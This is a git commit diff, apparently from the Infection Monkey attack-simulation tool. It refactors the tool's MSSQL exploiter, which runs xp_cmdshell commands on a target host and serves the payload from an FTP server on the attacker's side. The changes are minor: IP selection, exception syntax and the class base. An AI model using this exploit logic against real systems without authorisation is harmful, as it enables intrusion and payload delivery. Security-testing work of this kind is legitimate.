* Using get_interface_to_target function in order to retrieve right ip

to use. * changed exception syntax to 'as' instead of ',' * added Object to the FTP class
2018-07-16 16:29:28 +03:00 · 2018-07-16 16:29:28 +03:00 · 9877b9499c
parent 782ced912d
commit 9877b9499c
2 changed files with 7 additions and 6 deletions
--- a/infection_monkey/exploit/mssqlexec.py
+++ b/infection_monkey/exploit/mssqlexec.py
@ -51,7 +51,7 @@ class MSSQLExploiter(HostExploiter):
                True or False depends on process success
        """

-        chosen_attack = self.attacks_list[0](payload, cursor)
+        chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr)

        if chosen_attack.send_payload():
            LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
--- a/infection_monkey/exploit/mssqlexec_utils.py
+++ b/infection_monkey/exploit/mssqlexec_utils.py
@ -5,6 +5,7 @@ import socket

 import pymssql

+from exploit.tools import get_interface_to_target
 from pyftpdlib.authorizers import DummyAuthorizer
 from pyftpdlib.handlers import FTPHandler
 from pyftpdlib.servers import FTPServer
@ -22,7 +23,7 @@ FTP_WORKING_DIR = '.'
 LOG = logging.getLogger(__name__)


-class FTP:
+class FTP(object):

    """Configures and establish an FTP server with default details.

@ -103,11 +104,11 @@ class CmdShellAttack(AttackHost):

    """

-    def __init__(self, payload_path, cursor):
+    def __init__(self, payload_path, cursor, dst_ip_address):
        super(CmdShellAttack, self).__init__(payload_path)
        self.ftp_server, self.ftp_server_p = self.__init_ftp_server()
        self.cursor = cursor
-        self.attacker_ip = self.__find_own_ip()
+        self.attacker_ip = get_interface_to_target(dst_ip_address)

    def send_payload(self):
        """
@ -134,7 +135,7 @@ class CmdShellAttack(AttackHost):
                # Running the cmd on remote host
                for cmd in shellcmds:
                    self.cursor.execute(cmd)
-            except Exception, e:
+            except Exception as e:
                LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
                self.ftp_server_p.terminate()
                return False
@ -195,7 +196,7 @@ class CmdShellAttack(AttackHost):
            p.start()
            LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
            return ftp_s, p
-        except Exception, e:
+        except Exception as e:
            LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
            return None, None